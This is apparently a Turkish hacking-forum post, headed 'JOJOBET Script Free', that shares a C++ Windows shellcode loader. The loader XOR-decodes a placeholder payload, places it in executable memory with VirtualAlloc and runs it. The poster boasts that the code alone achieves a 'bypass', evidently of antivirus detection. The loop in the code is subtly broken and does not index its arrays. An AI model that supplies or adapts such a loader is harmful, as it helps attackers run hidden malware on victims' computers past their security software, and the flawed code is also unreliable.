JOJOBET Script Free

Katılım
1 Haz 2021
Tepki puanı
530
Rating - 0%
Kod:
#include <windows.h>

#include <iostream>

int main(int argc, char **argv) {

char b[] = {/* your XORd with key of 'x' shellcode goes here i.e. 0x4C,0x4F, 0x4C */};

char c[sizeof b];

for (int i = 0; i < sizeof b; i++) {c = b ^ 'x';}

void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

memcpy(exec, c, sizeof c);

((void(*)())exec)();

}

bu kodu yazınca zaten baypass oluyor :D
 
131,448Konular
3,268,235Mesajlar
315,153Kullanıcılar
joggeSon Üye
Üst Alt